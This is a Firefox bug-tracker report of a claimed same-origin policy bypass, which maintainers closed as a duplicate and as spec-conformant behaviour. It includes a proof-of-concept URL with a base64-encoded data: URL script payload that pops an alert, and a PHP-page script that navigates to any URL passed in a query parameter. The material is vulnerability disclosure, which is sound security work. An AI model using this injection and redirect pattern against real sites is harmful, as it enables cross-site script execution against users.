Closed
Bug 1292485
Opened 8 years ago
Closed 8 years ago
Firefox V48.0 Same Origin Policy Bypass
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 255107
People
(Reporter: 1009465756, Unassigned)
Details
Attachments
(1 file)
48.86 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 Steps to reproduce: Version: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 PoC: http://2.srcms.applinzi.com/uxss.php?ff=data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg== uxss.php: <script> function getParameter(name){ var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r); return (!m ? "" : m[2]); } if(typeof(pgvMain) == "function") { pgvMain(); } var durl = getParameter("ff"); setTimeout(function(){ window.location.replace(durl); }, 2); </script> Actual results: When the browser executes the 'window.location.replace(durl);' command, the data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg== should belong to the data URL origin, but in this case, the 'data:text/html' could read the 'http://2.srcms.applinzi.com' origin's 'location.href'. So this is a typical Same Origin Police Bypass problem Expected results: data URL could never read the content of the refer pages.
Reporter | ||
Updated•8 years ago
|
Summary: Firefox V48.0 Same Origin Police Bypass → Firefox V48.0 Same Origin Policy Bypass
Updated•8 years ago
|
Group: firefox-core-security → core-security
Flags: sec-bounty?
Comment 1•8 years ago
|
||
This is actually how navigating to a data: URL is spec'd in HTML5, though most browsers don't do this. We're considering changing the behavior.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty-
You need to log in
before you can comment on or make changes to this bug.
Description
•